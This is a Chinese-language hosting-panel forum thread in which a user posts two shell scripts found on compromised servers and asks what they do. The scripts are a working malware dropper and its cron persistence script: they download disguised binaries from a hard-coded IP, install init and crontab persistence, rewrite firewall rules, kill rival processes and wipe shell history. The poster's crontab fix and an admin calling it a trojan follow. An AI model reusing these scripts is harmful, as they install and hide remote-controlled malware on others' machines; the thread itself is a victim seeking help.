无标题文档
wdCP系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用教程) wdCDN系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用手册)
wdOS系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用教程) wdDNS系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用手册)
注册 发贴 提问 回复-必看必看 wddns免费智能 DNS 开通 本地或虚拟机使 用wdcp 一键包在mysql编 译时"卡住"
【300G高防】双线 无视攻击 wdcp官方技术支持/服务 阿里云8折优惠券 无敌云 腾讯云优惠中,现注册更有260代金额券赠送
返回列表 发帖
sendsky

Rank: 2
1# 跳转到 » 倒序看帖
打印
tT
发表于 2015-4-4 11:31 | 只看该作者
提问三步曲: 提问先看教程/FAQ索引(wdcp,wdcp_v3,一键包)及搜索,会让你更快解决问题
1 提供详细,如系统版本,wdcp版本,软件版本等及错误的详细信息,贴上论坛或截图发论坛
2 做过哪些操作或改动设置等

温馨提示:信息不详,很可能会没人理你!论坛有教程说明的,也可能没人理!因为,你懂的

[求助] 求解答这些文件的含义

文件1 来源于~/99
据推测应该是上次出现高危漏洞的时候打过补丁之后产生的文件,从此之后vps一直死mysql,报告多次未接,终于找到元凶了,求解答

文件2 由文件1生成并加入crontab 加了两次路径/usr/lib/lm/scon.sh,从此mysql一天死两次,噩梦啊
我的两台vps都是同一时间更新的 都有这个问题,其他vps更新时间不同,没有问题,有问题的同学可以参照我下面给出的临时解决方案或重装系统!!

文件2我看了半天也没找到关于mysql的东西(技术太菜了~~),但是只要执行,mysql必死!!! 也可能是我内存太小了?

发帖有长度限制,发不了,发附件了..

Desktop.zip (2.25 KB)
收藏 分享

sendsky

Rank: 2
2#
发表于 2015-4-4 11:32 | 只看该作者
文件1
  1. #! /bin/bash

  3. pkill -9 https
  4. pkill -9 pstart
  5. rm -rf /usr/lib/lm
  6. rm -rf /var/opt/lm
  7. rm -rf /lib/lib1*
  8. sed -i '/scon.sh/d' /etc/crontab
  9. sed -i '/pstart/d' /etc/rc.local
  10. sed -i '/https/d' /etc/rc.local
  11. rm -rf /etc/init.d/iislog
  12. rm -rf /etc/rc.d/init.d/iislog
  13. rm -rf /bin/.ipt*
  14. mkdir /var/opt
  15. mkdir /var/opt/lm
  16. pkill -9 .sshd
  17. pkill -9 L2
  18. rm -rf /usr/bin/.sshd
  19. rm -rf /root/L2*
  20. rm 99.jpg
  21. cp /usr/bin/wget /var/opt/lm/
  22. chmod 755 /var/opt/lm/wget
  23. cd /var/opt/lm
  24. /var/opt/lm/wget http://117.21.220.196:8891/11/iislog.jpg
  25. mv iislog.jpg iislog
  26. chmod 755 iislog
  27. /var/opt/lm/wget http://117.21.220.196:8891/11/https.jpg
  28. mv https.jpg https
  29. chmod 755 https
  30. /var/opt/lm/wget http://117.21.220.196:8891/11/pstart.jpg
  31. mv pstart.jpg pstart
  32. chmod 755 pstart
  33. cp pstart /lib/lib19.so.1
  34. cp https /lib/lib17.so.1
  35. bash iislog
  36. cp iislog /etc/rc.d/init.d/
  37. cp iislog /etc/init.d/
  38. ln -sf /etc/rc.d/init.d/iislog /etc/rc.d/rc2.d/S998iislog
  39. ln -sf /etc/rc.d/init.d/iislog /etc/rc.d/rc3.d/S998iislog
  40. ln -sf /etc/rc.d/init.d/iislog /etc/rc.d/rc5.d/S998iislog
  41. ln -sf /etc/init.d/iislog /etc/rc2.d/S998iislog
  42. ln -sf /etc/init.d/iislog /etc/rc3.d/S998iislog
  43. ln -sf /etc/init.d/iislog /etc/rc5.d/S998iislog
  44. rm iislog
  45. /etc/init.d/crond start
  46. /etc/init.d/cron start
  47. echo "09 18 * * * root /usr/lib/lm/scon.sh" >>/etc/crontab
  48. mkdir /usr/lib/lm
  49. sleep 1s
  50. cd /usr/lib/lm
  51. rm -f /usr/lib/lm/scon.sh
  52. /var/opt/lm/wget http://117.21.220.196:8891/11/scon.sh
  53. chmod 755 /usr/lib/lm/scon.sh
  54. /etc/init.d/crond restart
  55. /etc/init.d/cron restart
  56. sleep 10s
  57. netstat -an >a.txt
  58. sleep 1s
  59. grep "133:21" a.txt >/dev/null && touch /usr/lib/lm/aaa
  60. myFile="/usr/lib/lm/aaa"
  61. if [ ! -f "$myFile" ]; then
  62. /var/opt/lm/wget http://117.21.220.196:8891/11/http.jpg
  63. mv http.jpg http
  64. chmod 755 http
  65. pkill -9 https
  66. rm /lib/lib17.so.1
  67. rm /var/opt/lm/https
  68. cp http /lib/lib17.so.1
  69. mv http /var/opt/lm/https
  70. /var/opt/lm/https
  71. sleep 1s
  72. kill -s 9 `pgrep freeBSD`
  73. sleep 1s
  74. pkill -9 freeBSD
  75. else
  76. sleep 1s
  77. fi
  78. cp /var/opt/lm/pstart /bin/.iptab1
  79. cp /var/opt/lm/https /bin/.iptab2
  80. cp /usr/lib/lm/scon.sh /bin/.iptab3
  81. rm /usr/lib/lm/aaa
  82. rm /usr/lib/lm/a.txt
  83. echo 1 > /proc/sys/vm/drop_caches
  84. iptables -F
  85. iptables -X
  86. iptables -A OUTPUT -p TCP --dport 10071 -j DROP
  87. iptables -A OUTPUT -p TCP --dport 10086 -j DROP
  88. iptables -A OUTPUT -p TCP --dport 2847 -j DROP
  89. iptables -A OUTPUT -p TCP --dport 10991 -j DROP
  90. iptables -A OUTPUT -p TCP --dport 6009 -j DROP
  91. iptables -A INPUT -p TCP --dport 60003 -j DROP
  92. iptables -A INPUT -p TCP --dport 19009 -j DROP
  93. iptables -A OUTPUT -p TCP --dport 55555 -j DROP
  94. iptables -A OUTPUT -p TCP --dport 301 -j DROP
  95. iptables -A OUTPUT -p TCP --dport 57707 -j DROP
  96. iptables -A OUTPUT -p TCP --dport 50050 -j DROP
  97. iptables -A OUTPUT -p TCP --dport 59870 -j DROP
  98. iptables -A OUTPUT -p TCP --dport 49870 -j DROP
  99. iptables -A OUTPUT -p TCP --dport 40660 -j DROP
  100. iptables -A OUTPUT -p TCP --dport 7788 -j DROP
  101. iptables -A OUTPUT -p TCP --dport 7668 -j DROP
  102. iptables -A OUTPUT -p TCP --dport 7168 -j DROP
  103. iptables -A OUTPUT -p TCP --dport 888 -j DROP
  104. iptables -A OUTPUT -p TCP --dport 25000 -j DROP
  105. iptables -A OUTPUT -p TCP --dport 900:905 -j DROP
  106. iptables -A OUTPUT -p TCP --dport 10500:10999 -j DROP
  107. iptables -A OUTPUT -p TCP --dport 35999:36999 -j DROP
  108. iptables -A OUTPUT -p TCP --dport 45000 -j DROP
  109. iptables -A OUTPUT -p TCP --dport 58000 -j DROP
  110. iptables -A OUTPUT -p TCP --dport 11283 -j DROP
  111. iptables -A OUTPUT -p TCP --dport 45678 -j DROP
  112. iptables -A OUTPUT -p TCP --dport 56789 -j DROP
  113. /sbin/iptables -A OUTPUT -p TCP --dport 48080 -j DROP
  114. iptables -I INPUT -s 115.231.17.9 -j DROP
  115. iptables -I INPUT -s 118.123.19.9 -j DROP
  116. iptables -I INPUT -s 208.98.15.162 -j DROP


  119. chmod a-x /usr/bin/wget
  120. chattr +i /usr/bin/wget
  121. pkill -9 64
  122. pkill -9 32
  123. pkill -9 BSD
  124. pkill -9 dos
  125. pkill -9 syn
  126. pkill -9 linuxx
  127. pkill -9 pdd
  128. pkill -9 ffg
  129. pkill -9 ddd
  130. pkill -9 dxd
  131. pkill -9 sdd
  132. pkill -9 Alipay
  133. pkill -9 asd
  134. pkill -9 92
  135. pkill -9 node
  136. pkill -9 Iptab
  137. pkill -9 Inter
  138. pkill -9 mimi
  139. pkill -9 24
  140. pkill -9 26
  141. pkill -9 per
  142. pkill -9 360
  143. pkill -9 888
  144. pkill -9 AC
  145. pkill -9 c5
  146. pkill -9 cis
  147. pkill -9 huzi
  148. pkill -9 monitor
  149. pkill -9 my
  150. pkill -9 oda
  151. pkill -9 per
  152. pkill -9 pyt
  153. pkill -9 sb
  154. pkill -9 udp
  155. pkill -9 proce.r
  156. pkill -9 China
  157. pkill -9 42
  158. pkill -9 myout.file
  159. pkill -9 wget-log
  160. pkill -9 and
  161. pkill -9 inux
  162. pkill -9 iD.1
  163. pkill -9 iP.1
  164. pkill -9 Mia
  165. rm -rf /tmp/.ssh*
  166. rm -rf /etc/.SSH*
  167. pkill -9 SSH2
  168. pkill -9 SSHH2
  169. rm -rf /tmp/.ssh*
  170. pkill -9 sshhdd
  171. pkill -9 sshdd
  172. rm -rf /tmp/.ssh*
  173. rm -rf /boot/.I*
  174. rm -rf /etc/.SSH*
  175. pkill -9 gfhjr

  177. rm -f /boot/.I*
  178. rm -f /boot/I*
  179. history -c
复制代码

TOP

sendsky

Rank: 2
3#
发表于 2015-4-4 11:33 | 只看该作者
文件2
  1. #!/bin/sh
  2. /etc/init.d/iptables start
  3. /sbin/iptables -F
  4. /sbin/iptables -X
  5. /sbin/iptables -A OUTPUT -p TCP --dport 10071 -j DROP
  6. /sbin/iptables -A OUTPUT -p TCP --dport 10086 -j DROP
  7. /sbin/iptables -A OUTPUT -p TCP --dport 2847 -j DROP
  8. /sbin/iptables -A OUTPUT -p TCP --dport 10991 -j DROP
  9. /sbin/iptables -A OUTPUT -p TCP --dport 6009 -j DROP
  10. /sbin/iptables -A INPUT -p TCP --dport 60003 -j DROP
  11. /sbin/iptables -A INPUT -p TCP --dport 19009 -j DROP
  12. /sbin/iptables -A OUTPUT -p TCP --dport 55555 -j DROP
  13. /sbin/iptables -A OUTPUT -p TCP --dport 301 -j DROP
  14. /sbin/iptables -A OUTPUT -p TCP --dport 57707 -j DROP
  15. /sbin/iptables -A OUTPUT -p TCP --dport 50050 -j DROP
  16. /sbin/iptables -A OUTPUT -p TCP --dport 59870 -j DROP
  17. /sbin/iptables -A OUTPUT -p TCP --dport 49870 -j DROP
  18. /sbin/iptables -A OUTPUT -p TCP --dport 40660 -j DROP
  19. /sbin/iptables -A OUTPUT -p TCP --dport 7788 -j DROP
  20. /sbin/iptables -A OUTPUT -p TCP --dport 7668 -j DROP
  21. /sbin/iptables -A OUTPUT -p TCP --dport 7168 -j DROP
  22. /sbin/iptables -A OUTPUT -p TCP --dport 888 -j DROP
  23. /sbin/iptables -A OUTPUT -p TCP --dport 25000 -j DROP
  24. /sbin/iptables -A OUTPUT -p TCP --dport 900:905 -j DROP
  25. /sbin/iptables -A OUTPUT -p TCP --dport 10500:10999 -j DROP
  26. /sbin/iptables -A OUTPUT -p TCP --dport 35999:36999 -j DROP
  27. /sbin/iptables -A OUTPUT -p TCP --dport 45000 -j DROP
  28. /sbin/iptables -A OUTPUT -p TCP --dport 58000 -j DROP
  29. /sbin/iptables -A OUTPUT -p TCP --dport 11283 -j DROP
  30. /sbin/iptables -A OUTPUT -p TCP --dport 45678 -j DROP
  31. /sbin/iptables -A OUTPUT -p TCP --dport 56789 -j DROP
  32. /sbin/iptables -A OUTPUT -p TCP --dport 48080 -j DROP
  33. /sbin/iptables -I INPUT -s 115.231.17.9 -j DROP
  34. /sbin/iptables -I INPUT -s 118.123.19.9 -j DROP
  35. /sbin/iptables -I INPUT -s 208.98.15.162 -j DROP
  36. mkdir /var/opt/lm
  37. cd /var/opt/lm
  38. myFile="/var/opt/lm/pstart"
  39. if [ ! -f "$myFile" ]; then
  40. mkdir /var/opt
  41. mkdir /var/opt/lm
  42. cp /lib/lib19.so.1 /var/opt/lm/pstart
  43. sleep 1s
  44. chmod 755 /var/opt/lm/pstart
  45. sleep 2s
  46. kill -s 9 `pgrep freeBSD`
  47. sleep 1s
  48. pkill -9 freeBSD
  49. else
  50. sleep 1s
  51. fi

  53. myFile="/var/opt/lm/https"
  54. if [ ! -f "$myFile" ]; then
  55. mkdir /var/opt
  56. mkdir /var/opt/lm
  57. cp /lib/lib17.so.1 /var/opt/lm/https
  58. sleep 1s
  59. chmod 755 /var/opt/lm/https
  60. sleep 2s
  61. kill -s 9 `pgrep BSD`
  62. sleep 1s
  63. pkill -9 BSD
  64. else
  65. sleep 1s
  66. fi


  69. program=pstart  
  70. sn=`ps -ef | grep $program | grep -v grep |awk '{print $2}'`
  71. if [ "${sn}" = "" ]   
  72. then
  73. /var/opt/lm/pstart
  74. sleep 2s
  75. else
  76. sleep 2s
  77. fi
  78. sleep 1s
  79. pkill -9 BSD
  80. sleep 2s


  83. program=https  
  84. sn=`ps -ef | grep $program | grep -v grep |awk '{print $2}'`
  85. if [ "${sn}" = "" ]   
  86. then
  87. /var/opt/lm/https
  88. sleep 1s
  89. else
  90. sleep 1s
  91. fi
  92. sleep 1s


  95. sleep 1s
  96. kill -s 9 `pgrep freeBSD`

  98. /usr/sbin/iptables -F
  99. /usr/sbin/iptables -X
  100. /usr/sbin/iptables -A OUTPUT -p TCP --dport 10071 -j DROP
  101. /usr/sbin/iptables -A OUTPUT -p TCP --dport 2847 -j DROP
  102. /usr/sbin/iptables -A OUTPUT -p TCP --dport 10991 -j DROP
  103. /usr/sbin/iptables -A OUTPUT -p TCP --dport 6009 -j DROP
  104. /usr/sbin/iptables -A INPUT -p TCP --dport 60003 -j DROP
  105. /usr/sbin/iptables -A INPUT -p TCP --dport 19009 -j DROP
  106. /usr/sbin/iptables -A OUTPUT -p TCP --dport 55555 -j DROP
  107. /usr/sbin/iptables -A OUTPUT -p TCP --dport 301 -j DROP
  108. /usr/sbin/iptables -A OUTPUT -p TCP --dport 57707 -j DROP
  109. /usr/sbin/iptables -A OUTPUT -p TCP --dport 59870 -j DROP
  110. /usr/sbin/iptables -A OUTPUT -p TCP --dport 50050 -j DROP
  111. /usr/sbin/iptables -A OUTPUT -p TCP --dport 49870 -j DROP
  112. /usr/sbin/iptables -A OUTPUT -p TCP --dport 40660 -j DROP
  113. /usr/sbin/iptables -A OUTPUT -p TCP --dport 7788 -j DROP
  114. /usr/sbin/iptables -A OUTPUT -p TCP --dport 888 -j DROP
  115. /usr/sbin/iptables -A OUTPUT -p TCP --dport 25000 -j DROP
  116. /usr/sbin/iptables -A OUTPUT -p TCP --dport 900:905 -j DROP
  117. /usr/sbin/iptables -A OUTPUT -p TCP --dport 10500:10999 -j DROP
  118. /usr/sbin/iptables -A OUTPUT -p TCP --dport 35999:36100 -j DROP
  119. /usr/sbin/iptables -A OUTPUT -p TCP --dport 45000 -j DROP
  120. /usr/sbin/iptables -A OUTPUT -p TCP --dport 45000 -j DROP
  121. /usr/sbin/iptables -A OUTPUT -p TCP --dport 58000 -j DROP
  122. /usr/sbin/iptables -A OUTPUT -p TCP --dport 11283 -j DROP
  123. /usr/sbin/iptables -A OUTPUT -p TCP --dport 45678 -j DROP
  124. /usr/sbin/iptables -A OUTPUT -p TCP --dport 56789 -j DROP
  125. /usr/sbin/iptables -I INPUT -s 115.231.17.9 -j DROP
  126. /usr/sbin/iptables -I INPUT -s 118.123.19.9 -j DROP
  127. /usr/sbin/iptables -I INPUT -s 208.98.15.162 -j DROP
  128. pkill -9 64
  129. pkill -9 32
  130. pkill -9 BSD
  131. pkill -9 dos
  132. pkill -9 syn
  133. pkill -9 linuxx
  134. pkill -9 pdd
  135. pkill -9 ffg
  136. pkill -9 ddd
  137. pkill -9 dxd
  138. pkill -9 sdd
  139. pkill -9 Alipay
  140. pkill -9 asd
  141. pkill -9 92
  142. pkill -9 node
  143. pkill -9 Iptab
  144. pkill -9 Inter
  145. pkill -9 mimi
  146. pkill -9 24
  147. pkill -9 26
  148. pkill -9 per
  149. pkill -9 360
  150. pkill -9 888
  151. pkill -9 AC
  152. pkill -9 c5
  153. pkill -9 cis
  154. pkill -9 huzi
  155. pkill -9 monitor
  156. pkill -9 my
  157. pkill -9 oda
  158. pkill -9 per
  159. pkill -9 pyt
  160. pkill -9 sb
  161. pkill -9 udp
  162. pkill -9 proce.r
  163. pkill -9 China
  164. pkill -9 42
  165. pkill -9 myout.file
  166. pkill -9 wget-log
  167. pkill -9 and
  168. pkill -9 inux
  169. pkill -9 iD.1
  170. pkill -9 iP.1
  171. pkill -9 Mia
  172. pkill -9 iisdate
  173. rm -rf /tmp/.ssh*
  174. rm -rf /etc/.SSH*
  175. pkill -9 SSH2
  176. pkill -9 SSHH2
  177. rm -rf /tmp/.ssh*
  178. pkill -9 sshhdd
  179. pkill -9 sshdd
  180. rm -rf /tmp/.ssh*
  181. rm -rf /boot/.I*
  182. rm -rf /etc/.SSH*
  183. pkill -9 gfhjr

  185. rm -f /boot/I*
  186. rm -rf /var/spool/mail/root
复制代码

TOP

sendsky

Rank: 2
4#
发表于 2015-4-4 12:00 | 只看该作者
临时解决办法
vi /etc/crontab
删掉那两行计划任务
然后
service crond restart
即可
其他文件删不删随你

TOP

sendsky

Rank: 2
5#
发表于 2015-4-4 12:10 | 只看该作者
查到是执行
pkill -9 my
导致mysql死亡

TOP

admin

Rank: 9Rank: 9Rank: 9
6#
发表于 2015-4-8 11:33 | 只看该作者
这个是马吧
看清提问三步曲及多看教程/FAQ索引(wdcp,v3,一键包,wdOS),益处多多.wdcp工具集 阿里云主机8折优惠码

TOP

返回列表